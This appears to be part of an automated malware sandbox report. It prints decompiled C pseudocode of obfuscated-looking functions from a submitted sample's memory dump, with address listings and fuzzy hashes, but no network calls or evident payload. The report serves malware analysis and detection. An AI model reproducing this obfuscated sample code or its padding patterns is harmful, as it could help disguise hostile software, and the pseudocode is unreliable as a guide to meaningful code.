                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t635 - 0x34)) = _t635[0x1f] +  *0x116defc;
                                                                                                                                                                                                                                                    				_t635[0x15] = _t635[0x1f] +  *0x116df30;
                                                                                                                                                                                                                                                    				_t635[0x16] =  *(_t635[0x1c] + _t635[0x1f]) & 0x000000ff;
                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                    					_t642 = _t635[0x16] - (_t635[0x19] & 0x0000ffff);
                                                                                                                                                                                                                                                    					if(_t635[0x16] < (_t635[0x19] & 0x0000ffff)) {
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t635[9] =  *(_t635[0x14] + 0x66f0);
                                                                                                                                                                                                                                                    					_t635[0x19] = _t635[0x19] - 1;
                                                                                                                                                                                                                                                    					_t635[0xa] = ( *(_t635[0x17] + 0x2ea6) & 0x0000ffff) -  *((intOrPtr*)(_t635[0x1e] + (_t635[0x19] & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                    					_t635[0xb] = _t635[0x16] + _t635[0x16];
                                                                                                                                                                                                                                                    					_push(_t635[0xb]);
                                                                                                                                                                                                                                                    					_t398 = E010E8C30(_t642, _t635[9], _t635[0xa]);
                                                                                                                                                                                                                                                    					_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                    					 *0x116dee8 = _t398;
                                                                                                                                                                                                                                                    					_t635[0x10] = (( *0x116def4 & 0x0000ffff) * 0x00000588 |  *(_t635[8] + _t635[0x1f] * 4)) / _t635[0x10];
                                                                                                                                                                                                                                                    					_t635[7] =  *(_t635[0x13] + 4 + _t635[0x1f] * 3 * 4);
                                                                                                                                                                                                                                                    					_t635[6] = _t635[0x1f];
                                                                                                                                                                                                                                                    					_t635[0x1f] = _t635[0x1f] + 1;
                                                                                                                                                                                                                                                    					_t643 = _t635[7] - _t635[6];
                                                                                                                                                                                                                                                    					if(_t635[7] < _t635[6]) {
                                                                                                                                                                                                                                                    						_t594 =  *0x116df24; // 0x0
                                                                                                                                                                                                                                                    						_t494 =  *0x116deec; // 0x0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t635[0x13] + ( *(_t635[0x17]) & 0x0000ffff) * 4)) =  *(_t594 + _t635[0x1f] * 4) /  *(_t635[0x1d] + 4) -  *((intOrPtr*)(_t494 + ( *(_t635[0x17]) & 0x0000ffff) * 4)) +  *((intOrPtr*)(_t635[0x13] + ( *(_t635[0x17]) & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                    						_t635[0x17] = _t635[0x17] + 2;
                                                                                                                                                                                                                                                    						_t635[0x1f] = _t635[0x1f] + 1;
                                                                                                                                                                                                                                                    						_t635[0x19] = _t635[0x19] + 1;
                                                                                                                                                                                                                                                    						_t412 =  *0x116dedc; // 0x0
                                                                                                                                                                                                                                                    						_t635[0x15] =  *((intOrPtr*)(_t412 + ((_t635[0x19] & 0x0000ffff) << 2) * 4));
                                                                                                                                                                                                                                                    						_t635[2] = ( *(_t635[0xc] + (( *(_t635[0x17]) & 0x0000ffff) << 2) * 2) & 0x0000ffff) * (_t635[0x18] & 0x000000ff);
                                                                                                                                                                                                                                                    						_t502 =  *0x116df14; // 0x0
                                                                                                                                                                                                                                                    						_t635[3] = _t502;
                                                                                                                                                                                                                                                    						_t635[4] =  *(_t635[0x14] + ( *(_t635[0x17]) & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                    						_t635[5] =  *(_t635[0xd] + 0x18 + _t635[0x16] * 4);
                                                                                                                                                                                                                                                    						 *(_t635[0x14]) =  *(_t635[0x14]) - 1;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t635[0xf] +  *(_t635[0x14]) * 4)) = E010E4DD0(_t635[0x15] & 0x000000ff, _t635[2], _t635[3], _t635[4], _t635[5]);
                                                                                                                                                                                                                                                    						 *(_t635 - 4) = _t635[0x15] & 0x000000ff;
                                                                                                                                                                                                                                                    						_t510 =  *0x116defc; // 0x0
                                                                                                                                                                                                                                                    						_t423 =  *0x116df20; // 0x0
                                                                                                                                                                                                                                                    						 *_t635 =  *0x116def4 & 0x0000ffff ^  *(_t423 + _t510 * 4);
                                                                                                                                                                                                                                                    						_t635[1] = _t635[0x1f];
                                                                                                                                                                                                                                                    						_push(_t635[1]);
                                                                                                                                                                                                                                                    						_t425 = E010E8C30(_t643,  *(_t635 - 4),  *_t635);
                                                                                                                                                                                                                                                    						_t638 = _t638 + 0x20;
                                                                                                                                                                                                                                                    						_t513 =  *0x116dedc; // 0x0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t513 + 0x10 + _t635[0x16] * 4)) = _t425;
                                                                                                                                                                                                                                                    						_t619 =  *0x116dee0; // 0x0
                                                                                                                                                                                                                                                    						asm("cdq");
                                                                                                                                                                                                                                                    						 *0x116defc = (( *0x116dee4 & 0x000000ff) - ( *(_t635[0x1c] + _t619 * 4) & 0x000000ff)) %  *(_t635[0xf] + (_t635[0x16] << 2) * 4) + 0x0000004a |  *0x116defc;
                                                                                                                                                                                                                                                    						 *((char*)(_t635[0x1c] +  *0x116df14 + 5)) = _t635[0x1f] % 0x1886;
                                                                                                                                                                                                                                                    						_t635[0x1f] = _t635[0x1f] + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t635[0x16] = _t635[0x16] + 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t548 =  *0x116dee0; // 0x0
                                                                                                                                                                                                                                                    				 *0x116df00 = (_t548 ^  *(_t635[0x13] + ( *(_t635[0x14]) << 1) * 4)) -  *(_t635[0x1d] + _t635[0x1f] * 4) ^ _t635[0x12] |  *0x116df00;
                                                                                                                                                                                                                                                    				_t459 =  *0x116df34; // 0x0
                                                                                                                                                                                                                                                    				 *((short*)(_t635[0x17] + 0x2c + ( *0x116def4 & 0x0000ffff) * 2)) = _t459;
                                                                                                                                                                                                                                                    				 *(_t635[0x1e] + _t635[0x1f] * 4) = 0xb04 /  *(_t635[0x1d] + 0x1c + _t635[0x1f] * 4) /  *(_t635[0x13] + 0x18 + _t635[0x1f] * 4) % 0xabc /  *(_t635[0x1e] + _t635[0x1f] * 4);
                                                                                                                                                                                                                                                    				 *(_t635[0x17]) =  *(_t635[0x17]) - 1;
                                                                                                                                                                                                                                                    				 *(_t635[0xe] + ( *(_t635[0x17]) & 0x0000ffff) * 2) = 0x1365 - _t635[0x12] + ( *(_t635[0xe] + ( *(_t635[0x17]) & 0x0000ffff) * 2) & 0x0000ffff);
                                                                                                                                                                                                                                                    				_t376 =  *0x116df38; // 0x0
                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                    				 *(_t635 - 0x18) = _t376 / ( *0x116def4 & 0x0000ffff);
                                                                                                                                                                                                                                                    				_t635[0x12] = _t635[0x12] - 1;
                                                                                                                                                                                                                                                    				 *(_t635 - 0x14) =  *(_t635[0xd] + ( *0x116dee6 & 0x000000ff) * 4) ^ _t635[0x12];
                                                                                                                                                                                                                                                    				_t380 =  *0x116def8; // 0x0
                                                                                                                                                                                                                                                    				 *(_t635 - 0x10) = _t380 *  *(_t635[0x1e] + 0xc + ( *(_t635[0x17]) & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                    				 *(_t635 - 0xc) = _t635[0x19] & 0x0000ffff;
                                                                                                                                                                                                                                                    				_t635[0x19] = _t635[0x19] + 1;
                                                                                                                                                                                                                                                    				_t575 =  *0x116deec; // 0x0
                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                    				 *(_t635 - 8) =  *(_t575 + _t635[0x1f] * 4) / (_t635[0x18] & 0x000000ff);
                                                                                                                                                                                                                                                    				_t635[0x18] = _t635[0x18] + 1;
                                                                                                                                                                                                                                                    				_t474 =  *0x116ded8; // 0x0
                                                                                                                                                                                                                                                    				_t635[0x11] = _t474;
                                                                                                                                                                                                                                                    				_t577 =  *0x116df38; // 0x0
                                                                                                                                                                                                                                                    				 *0x116df38 = _t577 - 1;
                                                                                                                                                                                                                                                    				_t389 = E010E64B0( *(_t635 - 0x18),  *(_t635 - 0x14),  *(_t635 - 0x10),  *(_t635 - 0xc),  *(_t635 - 8), _t635[0x11] & 0x0000ffff);
                                                                                                                                                                                                                                                    				_t477 =  *0x116df38; // 0x0
                                                                                                                                                                                                                                                    				_t581 =  *0x116deec; // 0x0
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t581 + 0x24 + _t477 * 4)) = _t389;
                                                                                                                                                                                                                                                    				_t390 =  *0x116df08; // 0x0
                                                                                                                                                                                                                                                    				__eflags =  &(_t635[0x1a]);
                                                                                                                                                                                                                                                    				return  *(_t635[0xc] + (_t390 << 1) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                    			}






































                                                                                                                                                                                                                                                    0x010d4251
                                                                                                                                                                                                                                                    0x010d4255
                                                                                                                                                                                                                                                    0x010d4262
                                                                                                                                                                                                                                                    0x010d426b
                                                                                                                                                                                                                                                    0x010d426e
                                                                                                                                                                                                                                                    0x010d4275
                                                                                                                                                                                                                                                    0x010d4285
                                                                                                                                                                                                                                                    0x010d4288
                                                                                                                                                                                                                                                    0x010d4290
                                                                                                                                                                                                                                                    0x010d4295
                                                                                                                                                                                                                                                    0x010d429b
                                                                                                                                                                                                                                                    0x010d42a1
                                                                                                                                                                                                                                                    0x010d42a9
                                                                                                                                                                                                                                                    0x010d42b8
                                                                                                                                                                                                                                                    0x010d42bb
                                                                                                                                                                                                                                                    0x010d42c4
                                                                                                                                                                                                                                                    0x010d42ca
                                                                                                                                                                                                                                                    0x010d42e1
                                                                                                                                                                                                                                                    0x010d42ea
                                                                                                                                                                                                                                                    0x010d42f8
                                                                                                                                                                                                                                                    0x010d4306
                                                                                                                                                                                                                                                    0x010d4321
                                                                                                                                                                                                                                                    0x010d4330
                                                                                                                                                                                                                                                    0x010d4339
                                                                                                                                                                                                                                                    0x010d433c
                                                                                                                                                                                                                                                    0x010d4348
                                                                                                                                                                                                                                                    0x010d4358
                                                                                                                                                                                                                                                    0x010d435c
                                                                                                                                                                                                                                                    0x010d436d
                                                                                                                                                                                                                                                    0x010d437b
                                                                                                                                                                                                                                                    0x010d437e
                                                                                                                                                                                                                                                    0x010d4385
                                                                                                                                                                                                                                                    0x010d4395
                                                                                                                                                                                                                                                    0x010d43a7
                                                                                                                                                                                                                                                    0x010d43b4
                                                                                                                                                                                                                                                    0x010d43bd
                                                                                                                                                                                                                                                    0x010d43d3
                                                                                                                                                                                                                                                    0x010d43d6
                                                                                                                                                                                                                                                    0x010d43df
                                                                                                                                                                                                                                                    0x010d43ee
                                                                                                                                                                                                                                                    0x010d43fa
                                                                                                                                                                                                                                                    0x010d4406
                                                                                                                                                                                                                                                    0x010d4414
                                                                                                                                                                                                                                                    0x010d4418
                                                                                                                                                                                                                                                    0x010d441b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d4432
                                                                                                                                                                                                                                                    0x010d443d
                                                                                                                                                                                                                                                    0x010d445d
                                                                                                                                                                                                                                                    0x010d4466
                                                                                                                                                                                                                                                    0x010d446c
                                                                                                                                                                                                                                                    0x010d4475
                                                                                                                                                                                                                                                    0x010d447a
                                                                                                                                                                                                                                                    0x010d447d
                                                                                                                                                                                                                                                    0x010d449d
                                                                                                                                                                                                                                                    0x010d44ab
                                                                                                                                                                                                                                                    0x010d44b1
                                                                                                                                                                                                                                                    0x010d44ba
                                                                                                                                                                                                                                                    0x010d44c0
                                                                                                                                                                                                                                                    0x010d44c3
                                                                                                                                                                                                                                                    0x010d44d7
                                                                                                                                                                                                                                                    0x010d44ee
                                                                                                                                                                                                                                                    0x010d450c
                                                                                                                                                                                                                                                    0x010d4515
                                                                                                                                                                                                                                                    0x010d451e
                                                                                                                                                                                                                                                    0x010d4529
                                                                                                                                                                                                                                                    0x010d4534
                                                                                                                                                                                                                                                    0x010d453c
                                                                                                                                                                                                                                                    0x010d4556
                                                                                                                                                                                                                                                    0x010d4559
                                                                                                                                                                                                                                                    0x010d455f
                                                                                                                                                                                                                                                    0x010d456e
                                                                                                                                                                                                                                                    0x010d457b
                                                                                                                                                                                                                                                    0x010d4589
                                                                                                                                                                                                                                                    0x010d45b0
                                                                                                                                                                                                                                                    0x010d45b7
                                                                                                                                                                                                                                                    0x010d45ba
                                                                                                                                                                                                                                                    0x010d45c7
                                                                                                                                                                                                                                                    0x010d45cf
                                                                                                                                                                                                                                                    0x010d45d5
                                                                                                                                                                                                                                                    0x010d45db
                                                                                                                                                                                                                                                    0x010d45e4
                                                                                                                                                                                                                                                    0x010d45e9
                                                                                                                                                                                                                                                    0x010d45ef
                                                                                                                                                                                                                                                    0x010d45f5
                                                                                                                                                                                                                                                    0x010d4600
                                                                                                                                                                                                                                                    0x010d4618
                                                                                                                                                                                                                                                    0x010d4625
                                                                                                                                                                                                                                                    0x010d4640
                                                                                                                                                                                                                                                    0x010d4649
                                                                                                                                                                                                                                                    0x010d4649
                                                                                                                                                                                                                                                    0x010d4411
                                                                                                                                                                                                                                                    0x010d4411
                                                                                                                                                                                                                                                    0x010d465b
                                                                                                                                                                                                                                                    0x010d4676
                                                                                                                                                                                                                                                    0x010d4686
                                                                                                                                                                                                                                                    0x010d468d
                                                                                                                                                                                                                                                    0x010d46cb
                                                                                                                                                                                                                                                    0x010d46db
                                                                                                                                                                                                                                                    0x010d46fe
                                                                                                                                                                                                                                                    0x010d4709
                                                                                                                                                                                                                                                    0x010d470e
                                                                                                                                                                                                                                                    0x010d4711
                                                                                                                                                                                                                                                    0x010d471a
                                                                                                                                                                                                                                                    0x010d472d
                                                                                                                                                                                                                                                    0x010d4739
                                                                                                                                                                                                                                                    0x010d4743
                                                                                                                                                                                                                                                    0x010d474a
                                                                                                                                                                                                                                                    0x010d4755
                                                                                                                                                                                                                                                    0x010d4760
                                                                                                                                                                                                                                                    0x010d4769
                                                                                                                                                                                                                                                    0x010d476c
                                                                                                                                                                                                                                                    0x010d4774
                                                                                                                                                                                                                                                    0x010d4777
                                                                                                                                                                                                                                                    0x010d477e
                                                                                                                                                                                                                                                    0x010d4782
                                                                                                                                                                                                                                                    0x010d478b
                                                                                                                                                                                                                                                    0x010d47aa
                                                                                                                                                                                                                                                    0x010d47b2
                                                                                                                                                                                                                                                    0x010d47b8
                                                                                                                                                                                                                                                    0x010d47be
                                                                                                                                                                                                                                                    0x010d47c2
                                                                                                                                                                                                                                                    0x010d47d1
                                                                                                                                                                                                                                                    0x010d47d7

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9704c2ec033d51e01fc4a171558dcff71a448b38e2e317fa8734444e882d99d5
                                                                                                                                                                                                                                                    • Instruction ID: 1b2beffc2c579ca48e626b6fce8fcd9f0a2c94b2b8f700fd29ae99fa6126bbc1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9704c2ec033d51e01fc4a171558dcff71a448b38e2e317fa8734444e882d99d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF12D774604258CFCB28CF69D4909A97BF2FF9C304B14816AEDA587369D775E892CF80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                                    			E010E7E80(signed int _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed short _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				short _v24;
                                                                                                                                                                                                                                                    				short _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                                                    				signed int _t324;
                                                                                                                                                                                                                                                    				signed int _t326;
                                                                                                                                                                                                                                                    				signed int _t328;
                                                                                                                                                                                                                                                    				intOrPtr _t336;
                                                                                                                                                                                                                                                    				signed int _t351;
                                                                                                                                                                                                                                                    				signed int _t376;
                                                                                                                                                                                                                                                    				signed int _t377;
                                                                                                                                                                                                                                                    				intOrPtr _t387;
                                                                                                                                                                                                                                                    				signed int _t389;
                                                                                                                                                                                                                                                    				signed int _t409;
                                                                                                                                                                                                                                                    				signed int _t423;
                                                                                                                                                                                                                                                    				signed int _t432;
                                                                                                                                                                                                                                                    				intOrPtr _t434;
                                                                                                                                                                                                                                                    				signed char _t475;
                                                                                                                                                                                                                                                    				signed int _t485;
                                                                                                                                                                                                                                                    				signed char _t493;
                                                                                                                                                                                                                                                    				signed short _t498;
                                                                                                                                                                                                                                                    				intOrPtr _t500;
                                                                                                                                                                                                                                                    				signed short _t504;
                                                                                                                                                                                                                                                    				signed int _t516;
                                                                                                                                                                                                                                                    				intOrPtr _t568;
                                                                                                                                                                                                                                                    				intOrPtr _t570;
                                                                                                                                                                                                                                                    				intOrPtr _t572;
                                                                                                                                                                                                                                                    				intOrPtr _t580;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v72 =  *((intOrPtr*)(_a8 + 0x74e0));
                                                                                                                                                                                                                                                    				_v12 = 0x11d7;
                                                                                                                                                                                                                                                    				_t475 =  *0x116dee4; // 0x0
                                                                                                                                                                                                                                                    				 *0x116dee4 = _t475 - 1;
                                                                                                                                                                                                                                                    				_t409 =  *0x116df30; // 0x0
                                                                                                                                                                                                                                                    				_v76 = ( *0x116dee4 & 0x000000ff) %  *(_a8 + _t409 * 4);
                                                                                                                                                                                                                                                    				_v80 =  *0x116def0 & 0x0000ffff | 0x00000fdd;
                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                    				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                    				_v52 = _a4 / 0x1d70;
                                                                                                                                                                                                                                                    				_t324 =  *0x116ded8; // 0x0
                                                                                                                                                                                                                                                    				_v64 = _t324 %  *0x116df00;
                                                                                                                                                                                                                                                    				_t485 =  *0x116ded8; // 0x0
                                                                                                                                                                                                                                                    				_v84 = _t485;
                                                                                                                                                                                                                                                    				_t326 =  *0x116df14; // 0x0
                                                                                                                                                                                                                                                    				 *0x116df14 = _t326 + 1;
                                                                                                                                                                                                                                                    				_t328 =  *0x116dee8; // 0x0
                                                                                                                                                                                                                                                    				_v88 = _t328 %  *0x116df14;
                                                                                                                                                                                                                                                    				_v92 = _a4 / _a4;
                                                                                                                                                                                                                                                    				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                    				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                    				_v20 = _a4;
                                                                                                                                                                                                                                                    				_v40 = _a4 |  *0x116dee0;
                                                                                                                                                                                                                                                    				_v68 = 0x278;
                                                                                                                                                                                                                                                    				_t572 =  *0x116df20; // 0x0
                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                    				_v36 = ( *0x116dee5 & 0x000000ff) /  *(_t572 + (_a4 << 1) * 4);
                                                                                                                                                                                                                                                    				_t493 =  *0x116dee6; // 0x0
                                                                                                                                                                                                                                                    				 *0x116dee6 = _t493 - 1;
                                                                                                                                                                                                                                                    				_v60 =  *0x116dee6 & 0x000000ff;
                                                                                                                                                                                                                                                    				_v16 = 0x7b4;
                                                                                                                                                                                                                                                    				_t336 =  *0x116df0c; // 0x0
                                                                                                                                                                                                                                                    				_v96 =  *(_t336 + _a4 * 4) ^ 0x0000117e;
                                                                                                                                                                                                                                                    				_v24 =  *((intOrPtr*)(_a8 + 0x16cc));
                                                                                                                                                                                                                                                    				_v48 = _a4;
                                                                                                                                                                                                                                                    				_v32 = ( *0x116def0 & 0x0000ffff) * _a4;
                                                                                                                                                                                                                                                    				_t498 =  *0x116def0; // 0x0
                                                                                                                                                                                                                                                    				 *0x116def0 = _t498 - 1;
                                                                                                                                                                                                                                                    				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                    				_t423 =  *0x116df30; // 0x0
                                                                                                                                                                                                                                                    				_t500 =  *0x116df24; // 0x0
                                                                                                                                                                                                                                                    				_v56 =  *((intOrPtr*)(_t500 + 4 + _t423 * 4));
                                                                                                                                                                                                                                                    				_v100 = _a4;
                                                                                                                                                                                                                                                    				_v104 =  *0x116dee5 & 0x000000ff ^  *(_a8 + 0x1f2c);
                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                    				_v28 = ( *0x116dee4 & 0x000000ff) % 0x17c;
                                                                                                                                                                                                                                                    				_t504 =  *0x116def0; // 0x0
                                                                                                                                                                                                                                                    				 *0x116def0 = _t504 - 1;
                                                                                                                                                                                                                                                    				_v44 = ( *0x116dee6 & 0x000000ff) *  *(_a8 + ( *0x116def0 & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                    				_a4 = _a4 + 1;
                                                                                                                                                                                                                                                    				_t570 =  *0x116df20; // 0x0
                                                                                                                                                                                                                                                    				 *0x116dee4 = _a4 /  *(_t570 + 0x134c) % _a4 - ( *0x116dee4 & 0x000000ff);
                                                                                                                                                                                                                                                    				_t351 =  *0x116df18; // 0x0
                                                                                                                                                                                                                                                    				 *0x116df18 = _t351 - 1;
                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                    				_t432 =  *0x116dee0; // 0x0
                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                    				_t516 =  *0x116dee0; // 0x0
                                                                                                                                                                                                                                                    				 *(_v40 + _t516 * 4) = ( *(_v56 +  *0x116dee0 * 3 * 4) * 0x00001eb5 /  *0x116df10 ^  *0x116df18) /  *(_v40 + _t432 * 4);
                                                                                                                                                                                                                                                    				_t434 =  *0x116dedc; // 0x0
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v36 + _v32 * 3 * 4)) = 0xa9c -  *((intOrPtr*)(_t434 + 0x24f8)) -  *((intOrPtr*)(_v36 + _v32 * 3 * 4));
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v52 + _v32 * 4)) =  *(_a8 + 0x3f10) ^  *(_v36 + (_v12 & 0x0000ffff) * 4) ^  *(_v52 + _v32 * 4);
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_a8 + _v32 * 4)) = 0xdd9 % _a4 / ( *0x116dee4 & 0x000000ff) +  *((intOrPtr*)(_a8 + _v32 * 4));
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_a8 + _a4 * 4)) = ( *(_v48 + _v32 * 3 * 4) ^ 0x00000798) * _v32 +  *((intOrPtr*)(_a8 + _a4 * 4));
                                                                                                                                                                                                                                                    				_v44 = _v44 - 1;
                                                                                                                                                                                                                                                    				_v5 =  *((intOrPtr*)(_v40 + _v44 * 3 * 4)) + (_v12 & 0x0000ffff) ^ 0x00000f02;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v36 + (_v20 & 0x0000ffff) * 3 * 4)) =  *(_v36 + (_v20 & 0x0000ffff) * 3 * 4) ^ 0x000002b7;
                                                                                                                                                                                                                                                    				_t376 =  *0x116df00; // 0x0
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_a8 + _a4 * 3 * 4)) !=  *((intOrPtr*)(_v40 + _t376 * 4))) {
                                                                                                                                                                                                                                                    					_t377 =  *0x116df00; // 0x0
                                                                                                                                                                                                                                                    					_v68 = _t377;
                                                                                                                                                                                                                                                    					_v16 = _v16 + 1;
                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_v36 + ((_v12 & 0x0000ffff) << 1) * 4)) = (_v16 & 0x0000ffff ^ 0x00000a3c) % ( *0x116dee4 & 0x000000ff) *  *(_v36 + ((_v12 & 0x0000ffff) << 1) * 4);
                                                                                                                                                                                                                                                    					_v12 = _v12 - 1;
                                                                                                                                                                                                                                                    					_v32 = _v32 - 1;
                                                                                                                                                                                                                                                    					_t387 =  *0x116def8; // 0x0
                                                                                                                                                                                                                                                    					return _t387 -  *((intOrPtr*)(_a8 + _v32 * 4));
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t389 =  *0x116df14; // 0x0
                                                                                                                                                                                                                                                    				 *(_a8 +  *0x116df30 * 3 * 4) = _t389 /  *(_a8 +  *0x116df30 * 3 * 4);
                                                                                                                                                                                                                                                    				 *0x116df14 = (_a4 &  *(_a8 + 0x64 + _a4 * 4)) +  *0x116df14;
                                                                                                                                                                                                                                                    				 *(_v48 + _a4 * 4) = 0x1992 %  *(_v48 + _a4 * 4);
                                                                                                                                                                                                                                                    				_v24 = (_a4 ^ 0x00000dbd) % _a4;
                                                                                                                                                                                                                                                    				_a4 = _a4 - 1;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_a8 + _a4 * 4)) = _v32 %  *(_v60 + _a4 * 4);
                                                                                                                                                                                                                                                    				_t580 =  *0x116dedc; // 0x0
                                                                                                                                                                                                                                                    				_v44 =  *(_v64 + (_v32 << 1) * 4) |  *(_t580 + 8 + _a4 * 4);
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_a8 + (_v12 & 0x0000ffff) * 4)) = _a4 -  *(_a8 + _a4 * 4) ^  *(_a8 + (_v12 & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                    				_v32 = _v32 - 1;
                                                                                                                                                                                                                                                    				_t568 =  *0x116def8; // 0x0
                                                                                                                                                                                                                                                    				return _t568 -  *((intOrPtr*)(_a8 + _v32 * 4));
                                                                                                                                                                                                                                                    			}




















































                                                                                                                                                                                                                                                    0x010e7e99
                                                                                                                                                                                                                                                    0x010e7ea1
                                                                                                                                                                                                                                                    0x010e7ea5
                                                                                                                                                                                                                                                    0x010e7eae
                                                                                                                                                                                                                                                    0x010e7ebb
                                                                                                                                                                                                                                                    0x010e7ec9
                                                                                                                                                                                                                                                    0x010e7ed9
                                                                                                                                                                                                                                                    0x010e7edc
                                                                                                                                                                                                                                                    0x010e7ee6
                                                                                                                                                                                                                                                    0x010e7ef5
                                                                                                                                                                                                                                                    0x010e7ef8
                                                                                                                                                                                                                                                    0x010e7f05
                                                                                                                                                                                                                                                    0x010e7f08
                                                                                                                                                                                                                                                    0x010e7f0e
                                                                                                                                                                                                                                                    0x010e7f11
                                                                                                                                                                                                                                                    0x010e7f19
                                                                                                                                                                                                                                                    0x010e7f1e
                                                                                                                                                                                                                                                    0x010e7f2b
                                                                                                                                                                                                                                                    0x010e7f36
                                                                                                                                                                                                                                                    0x010e7f3f
                                                                                                                                                                                                                                                    0x010e7f48
                                                                                                                                                                                                                                                    0x010e7f4f
                                                                                                                                                                                                                                                    0x010e7f5c
                                                                                                                                                                                                                                                    0x010e7f5f
                                                                                                                                                                                                                                                    0x010e7f72
                                                                                                                                                                                                                                                    0x010e7f78
                                                                                                                                                                                                                                                    0x010e7f7c
                                                                                                                                                                                                                                                    0x010e7f7f
                                                                                                                                                                                                                                                    0x010e7f88
                                                                                                                                                                                                                                                    0x010e7f95
                                                                                                                                                                                                                                                    0x010e7f9d
                                                                                                                                                                                                                                                    0x010e7fa4
                                                                                                                                                                                                                                                    0x010e7fb2
                                                                                                                                                                                                                                                    0x010e7fc7
                                                                                                                                                                                                                                                    0x010e7fce
                                                                                                                                                                                                                                                    0x010e7fdc
                                                                                                                                                                                                                                                    0x010e7fdf
                                                                                                                                                                                                                                                    0x010e7fea
                                                                                                                                                                                                                                                    0x010e7ff7
                                                                                                                                                                                                                                                    0x010e7ffa
                                                                                                                                                                                                                                                    0x010e8000
                                                                                                                                                                                                                                                    0x010e800a
                                                                                                                                                                                                                                                    0x010e8010
                                                                                                                                                                                                                                                    0x010e802b
                                                                                                                                                                                                                                                    0x010e8035
                                                                                                                                                                                                                                                    0x010e803d
